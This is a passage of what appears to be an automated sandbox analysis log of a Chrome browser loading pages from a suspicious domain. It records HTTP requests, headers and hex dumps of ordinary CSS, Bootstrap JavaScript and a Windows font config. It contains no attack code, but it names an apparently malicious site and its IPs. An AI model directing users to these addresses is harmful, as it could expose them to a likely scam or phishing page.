                              sec-ch-ua-platform: "Windows"
                              Accept: text/css,*/*;q=0.1
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: style
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:36 UTC777INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:36 GMT
                              Content-Type: text/css
                              Content-Length: 7969
                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "9a13f3506156bf7084aa380c75fda671"
                              Last-Modified: Sun, 11 Feb 2024 15:21:05 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB6293EC281
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1707664865#782664523/gid:0/gname:root/mode:33188/mtime:1707664865#834664609/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2024-02-11T15:21:05.86Z
                              Expires: Fri, 21 Feb 2025 07:09:36 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:36 UTC3319INData Raw: 09 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 62 66 66 3b 0a 20 20 20 20 2d 2d 69 6e 64 69 67 6f 3a 20 23 36 36 31 30 66 32 3b 0a 20 20 20 20 2d 2d 70 75 72 70 6c 65 3a 20 23 36 66 34 32 63 31 3b 0a 20 20 20 20 2d 2d 70 69 6e 6b 3a 20 23 65 38 33 65 38 63 3b 0a 20 20 20 20 2d 2d 72 65 64 3a 20 23 64 63 33 35 34 35 3b 0a 20 20 20 20 2d 2d 6f 72 61 6e 67 65 3a 20 23 66 64 37 65 31 34 3b 0a 20 20 20 20 2d 2d 79 65 6c 6c 6f 77 3a 20 23 66 66 63 31 30 37 3b 0a 20 20 20 20 2d 2d 67 72 65 65 6e 3a 20 23 32 38 61 37 34 35 3b 0a 20 20 20 20 2d 2d 74 65 61 6c 3a 20 23 32 30 63 39 39 37 3b 0a 20 20 20 20 2d 2d 63 79 61 6e 3a 20 23 31 37 61 32 62 38 3b 0a 20 20 20 20 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 3b 0a 20 20 20 20 2d 2d 67 72 61
                              Data Ascii: :root { --blue: #007bff; --indigo: #6610f2; --purple: #6f42c1; --pink: #e83e8c; --red: #dc3545; --orange: #fd7e14; --yellow: #ffc107; --green: #28a745; --teal: #20c997; --cyan: #17a2b8; --white: #fff; --gra
                              2024-02-22 07:09:36 UTC4096INData Raw: 70 6f 69 6e 74 65 72 0a 7d 0a 0a 2e 63 73 73 31 31 30 32 5f 34 30 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 38 61 37 34 35 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 32 38 61 37 34 35 0a 7d 0a 0a 2e 63 73 73 31 31 30 32 5f 34 30 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 31 38 38 33 38 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 31 65 37 65 33 34 0a 7d 0a 0a 2e 63 73 73 31 31 30 32 5f 34 30 2e 66 6f 63 75 73 2c 2e 63 73 73 31 31 30 32 5f 34 30 3a 66 6f 63 75 73 20 7b 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20
                              Data Ascii: pointer}.css1102_40 { color: #fff; background-color: #28a745; border-color: #28a745}.css1102_40:hover { color: #fff; background-color: #218838; border-color: #1e7e34}.css1102_40.focus,.css1102_40:focus { box-shadow: 0
                              2024-02-22 07:09:36 UTC554INData Raw: 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 21 69 6d 70 6f 72 74 61 6e 74 0a 7d 0a 0a 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 62 65 74 77 65 65 6e 20 7b 0a 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 6a 75 73 74 69 66 79 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 21 69 6d 70 6f 72 74 61 6e 74 0a 7d 0a 0a 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 61 72 6f 75 6e 64 20 7b 0a 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 64 69 73 74 72 69 62 75 74 65 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6a 75 73 74 69
                              Data Ascii: -pack: center!important; justify-content: center!important}.justify-content-between { -ms-flex-pack: justify!important; justify-content: space-between!important}.justify-content-around { -ms-flex-pack: distribute!important; justi


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.449748151.101.65.2294433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:37 UTC572OUTGET /npm/bootstrap@4.3.1/dist/js/bootstrap.bundle.min.js HTTP/1.1
                              Host: cdn.jsdelivr.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://y1uy13f.xuowltwo.live/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:37 UTC769INHTTP/1.1 200 OK
                              Connection: close
                              Content-Length: 78635
                              Access-Control-Allow-Origin: *
                              Access-Control-Expose-Headers: *
                              Timing-Allow-Origin: *
                              Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                              Cross-Origin-Resource-Policy: cross-origin
                              X-Content-Type-Options: nosniff
                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                              Content-Type: application/javascript; charset=utf-8
                              X-JSD-Version: 4.3.1
                              X-JSD-Version-Type: version
                              ETag: W/"1332b-JlpzPLf7xIH9JRCmWaha1VyTyJU"
                              Accept-Ranges: bytes
                              Date: Thu, 22 Feb 2024 07:09:37 GMT
                              Age: 3111460
                              X-Served-By: cache-fra-etou8220110-FRA, cache-ewr18161-EWR
                              X-Cache: HIT, HIT
                              Vary: Accept-Encoding
                              alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                              2024-02-22 07:09:37 UTC16384INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 33 2e 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22
                              Data Ascii: /*! * Bootstrap v4.3.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t,e){"
                              2024-02-22 07:09:37 UTC16384INData Raw: 61 79 2e 6c 65 6e 67 74 68 3b 69 66 28 30 3c 69 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 69 3b 6f 2b 2b 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 74 72 69 67 67 65 72 41 72 72 61 79 5b 6f 5d 2c 73 3d 6d 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 72 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 73 29 70 28 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 73 29 29 29 2e 68 61 73 43 6c 61 73 73 28 6d 74 29 7c 7c 70 28 72 29 2e 61 64 64 43 6c 61 73 73 28 76 74 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 21 31 29 7d 74 68 69 73 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 28 21 30 29 3b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 74 79
                              Data Ascii: ay.length;if(0<i)for(var o=0;o<i;o++){var r=this._triggerArray[o],s=m.getSelectorFromElement(r);if(null!==s)p([].slice.call(document.querySelectorAll(s))).hasClass(mt)||p(r).addClass(vt).attr("aria-expanded",!1)}this.setTransitioning(!0);this._element.sty
                              2024-02-22 07:09:37 UTC16384INData Raw: 72 6e 20 70 3b 69 66 28 70 2e 66 6c 69 70 70 65 64 26 26 70 2e 70 6c 61 63 65 6d 65 6e 74 3d 3d 3d 70 2e 6f 72 69 67 69 6e 61 6c 50 6c 61 63 65 6d 65 6e 74 29 72 65 74 75 72 6e 20 70 3b 76 61 72 20 67 3d 47 74 28 70 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 2c 70 2e 69 6e 73 74 61 6e 63 65 2e 72 65 66 65 72 65 6e 63 65 2c 6d 2e 70 61 64 64 69 6e 67 2c 6d 2e 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 2c 70 2e 70 6f 73 69 74 69 6f 6e 46 69 78 65 64 29 2c 5f 3d 70 2e 70 6c 61 63 65 6d 65 6e 74 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 2c 76 3d 74 65 28 5f 29 2c 79 3d 70 2e 70 6c 61 63 65 6d 65 6e 74 2e 73 70 6c 69 74 28 22 2d 22 29 5b 31 5d 7c 7c 22 22 2c 45 3d 5b 5d 3b 73 77 69 74 63 68 28 6d 2e 62 65 68 61 76 69 6f 72 29 7b 63 61 73 65 20 67
                              Data Ascii: rn p;if(p.flipped&&p.placement===p.originalPlacement)return p;var g=Gt(p.instance.popper,p.instance.reference,m.padding,m.boundariesElement,p.positionFixed),_=p.placement.split("-")[0],v=te(_),y=p.placement.split("-")[1]||"",E=[];switch(m.behavior){case g
                              2024-02-22 07:09:37 UTC16384INData Raw: 2d 68 69 64 64 65 6e 22 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6d 6f 64 61 6c 22 2c 21 30 29 2c 70 28 74 68 69 73 2e 5f 64 69 61 6c 6f 67 29 2e 68 61 73 43 6c 61 73 73 28 6f 6e 29 3f 74 68 69 73 2e 5f 64 69 61 6c 6f 67 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 75 6e 29 2e 73 63 72 6f 6c 6c 54 6f 70 3d 30 3a 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 3d 30 2c 6e 26 26 6d 2e 72 65 66 6c 6f 77 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2c 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 61 64 64 43 6c 61 73 73 28 63 6e 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 66 6f 63 75 73 26 26 74 68 69 73 2e 5f 65 6e 66 6f 72 63 65 46 6f 63 75 73 28 29 3b 76 61 72 20 69
                              Data Ascii: -hidden"),this._element.setAttribute("aria-modal",!0),p(this._dialog).hasClass(on)?this._dialog.querySelector(un).scrollTop=0:this._element.scrollTop=0,n&&m.reflow(this._element),p(this._element).addClass(cn),this._config.focus&&this._enforceFocus();var i
                              2024-02-22 07:09:37 UTC13099INData Raw: 3d 65 29 7d 2c 69 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 70 28 74 68 69 73 29 2e 64 61 74 61 28 43 6e 29 2c 65 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 6e 3b 69 66 28 28 74 7c 7c 21 2f 64 69 73 70 6f 73 65 7c 68 69 64 65 2f 2e 74 65 73 74 28 6e 29 29 26 26 28 74 7c 7c 28 74 3d 6e 65 77 20 69 28 74 68 69 73 2c 65 29 2c 70 28 74 68 69 73 29 2e 64 61 74 61 28 43 6e 2c 74 29 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27
                              Data Ascii: =e)},i._jQueryInterface=function(n){return this.each(function(){var t=p(this).data(Cn),e="object"==typeof n&&n;if((t||!/dispose|hide/.test(n))&&(t||(t=new i(this,e),p(this).data(Cn,t)),"string"==typeof n)){if("undefined"==typeof t[n])throw new TypeError('


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.44975023.51.58.94443
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:37 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                              Range: bytes=0-2147483646
                              User-Agent: Microsoft BITS/7.8
                              Host: fs.microsoft.com
                              2024-02-22 07:09:37 UTC455INHTTP/1.1 200 OK
                              ApiVersion: Distribute 1.1
                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                              Content-Type: application/octet-stream
                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                              Server: ECAcc (chd/0778)
                              X-CID: 11
                              Cache-Control: public, max-age=44134
                              Date: Thu, 22 Feb 2024 07:09:37 GMT
                              Content-Length: 55
                              Connection: close
                              X-CID: 2
                              2024-02-22 07:09:37 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.449744185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:37 UTC700OUTGET /media/mainstream/all/ab/1102.css HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: text/css,*/*;q=0.1
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: style
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:37 UTC779INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:37 GMT
                              Content-Type: text/css
                              Content-Length: 21546
                              Connection: close
                              ETag: "a42af1908408284441961ee5fac7891e"
                              Last-Modified: Sun, 11 Feb 2024 15:21:05 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB64C2D1C10
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1707664865#134663447/gid:0/gname:root/mode:33188/mtime:1707664865#214663580/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2024-02-11T15:21:05.24Z
                              Expires: Fri, 21 Feb 2025 07:09:37 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:37 UTC3317INData Raw: 2e 63 73 73 31 31 30 32 5f 35 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 33 32 66 33 66 0d 0a 7d 0d 0a 0d 0a 23 63 6f 6e 74 65 6e 74 31 2c 0d 0a 23 63 6f 6e 74 65 6e 74 32 2c 0d 0a 23 63 6f 6e 74 65 6e 74 33 2c 0d 0a 23 63 6f 6e 74 65 6e 74 34 20 7b 0d 0a 09 77 69 64 74 68 3a 20 35 30 25 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 31 35 70 78 0d 0a 7d 0d 0a 0d 0a 23 63 6f 6e 74 65 6e 74 31 2c 0d 0a 23 63 6f 6e 74 65 6e 74 32 2c 0d 0a 23 63 6f 6e 74 65 6e 74 33 20 7b 0d 0a 09 62 6f 72 64 65 72 2d 74 6f 70 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 32 33 32 66 33 65 3b 0d 0a 09 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 32 33 32 66 33 65 3b 0d 0a 09 62 6f 72 64 65 72 2d 6c
                              Data Ascii: .css1102_5 {background: #232f3f}#content1,#content2,#content3,#content4 {width: 50%;margin: auto;padding: 15px}#content1,#content2,#content3 {border-top: 2px solid #232f3e;border-right: 2px solid #232f3e;border-l
                              2024-02-22 07:09:37 UTC4096INData Raw: 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 6f 70 65 6e 20 73 61 6e 73 3b 0d 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 09 73 72 63 3a 20 6c 6f 63 61 6c 28 27 4f 70 65 6e 20 53 61 6e 73 20 52 65 67 75 6c 61 72 27 29 2c 20 6c 6f 63 61 6c 28 27 4f 70 65 6e 53 61 6e 73 2d 52 65 67 75 6c 61 72 27 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 31 37 2f 6d 65 6d 38 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 57 70 30 62 66 38 70 6b 41 70 36 61 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0d 0a 09 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30
                              Data Ascii: font-family: open sans;font-style: normal;font-weight: 400;src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v17/mem8YaGs126MiZpBA-UFWp0bf8pkAp6a.woff2) format('woff2');unicode-range: U+010
                              2024-02-22 07:09:37 UTC4096INData Raw: 62 6f 78 2d 69 6d 67 20 7b 0d 0a 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 32 30 25 3b 0d 0a 09 09 6d 61 78 2d 68 65 69 67 68 74 3a 20 33 38 70 78 3b 0d 0a 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 33 70 78 0d 0a 09 7d 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 34 39 39 70 78 29 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 34 30 30 70 78 29 20 7b 0d 0a 09 2e 62 6f 78 2d 69 6d 67 20 7b 0d 0a 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 32 30 25 3b 0d 0a 09 09 6d 61 78 2d 68 65 69 67 68 74 3a 20 33 35 70 78 3b 0d 0a 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 0d 0a 09 7d 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 33 39 39
                              Data Ascii: box-img {max-width: 20%;max-height: 38px;margin-top: 53px}}@media screen and (max-width:499px) and (min-width:400px) {.box-img {max-width: 20%;max-height: 35px;margin-top: 40px}}@media screen and (max-width:399
                              2024-02-22 07:09:37 UTC4096INData Raw: 72 65 6e 74 0d 0a 09 7d 0d 0a 7d 0d 0a 0d 0a 40 6b 65 79 66 72 61 6d 65 73 20 70 77 67 2d 70 75 6c 73 65 2d 77 68 69 74 65 20 7b 0d 0a 09 30 25 20 7b 0d 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 2e 32 29 0d 0a 09 7d 0d 0a 0d 0a 09 31 30 30 25 20 7b 0d 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 35 70 78 20 74 72 61 6e 73 70 61 72 65 6e 74 0d 0a 09 7d 0d 0a 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 33 35 20 69 6d 67 20 7b 0d 0a 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 6d 61 78 2d 68 65 69 67 68 74 3a 20 32 30 76 68 0d 0a 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 33 35 20 7b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 6f 70 65
                              Data Ascii: rent}}@keyframes pwg-pulse-white {0% {box-shadow: 0 0 0 0 rgba(255, 255, 255, .2)}100% {box-shadow: 0 0 0 25px transparent}}.css1102_35 img {max-width: 100%;max-height: 20vh}.css1102_35 {font-family: ope
                              2024-02-22 07:09:37 UTC4096INData Raw: 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 6f 70 65 6e 20 73 61 6e 73 2c 20 48 65 6c 76 65 74 69 63 61 4e 65 75 65 2c 20 68 65 6c 76 65 74 69 63 61 20 6e 65 75 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 0d 0a 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 31 34 20 7b 0d 0a 09 6d 61 78 2d 77 69 64 74 68 3a 20 32 30 30 70 78 3b 0d 0a 09 6d 61 78 2d 68 65 69 67 68 74 3a 20 34 35 30 70 78 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 0d 0a 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 31 32 20 2e 66 6c 65 78 2d 63 6f 75 6e 74 65 72 20 7b 0d 0a 09 62 6f 72 64 65 72
                              Data Ascii: ont-family: open sans, HelveticaNeue, helvetica neue, Helvetica, Arial, sans-serif}.css1102_14 {max-width: 200px;max-height: 450px;margin: 0 auto;display: block;width: 100%;cursor: pointer}.css1102_12 .flex-counter {border
                              2024-02-22 07:09:37 UTC1845INData Raw: 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 33 32 3e 64 69 76 20 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 0d 0a 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 33 32 20 2e 63 73 73 31 31 30 32 5f 33 34 20 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 0d 0a 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 32 39 20 7b 0d 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 0d 0a 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 32 38 20 7b 0d 0a 09 7a 2d 69 6e 64 65 78 3a 20 33 0d 0a 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 33 34 20 7b 0d 0a 09 7a 2d 69 6e 64 65 78 3a 20 32 0d 0a 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 33 30 7b 0d 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 0d 0a 7d 0d 0a 0d 0a 2e 63 73 73 31 31 30 32 5f 32 35 20 2e 63 73 73 31 31 30 32 5f
                              Data Ascii: }.css1102_32>div {position: absolute}.css1102_32 .css1102_34 {position: relative}.css1102_29 {z-index: 1}.css1102_28 {z-index: 3}.css1102_34 {z-index: 2}.css1102_30{z-index: 1}.css1102_25 .css1102_


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.449743185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:37 UTC712OUTGET /media/mainstream/flag-icon/css/flag-icon.css HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: text/css,*/*;q=0.1
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: style
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:37 UTC786INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:37 GMT
                              Content-Type: text/css
                              Content-Length: 39806
                              Connection: close
                              ETag: "b7a46a018dcd21a4828bae0b04ddcc6c"
                              Last-Modified: Tue, 21 Nov 2023 12:30:15 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB64C9A2CED
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
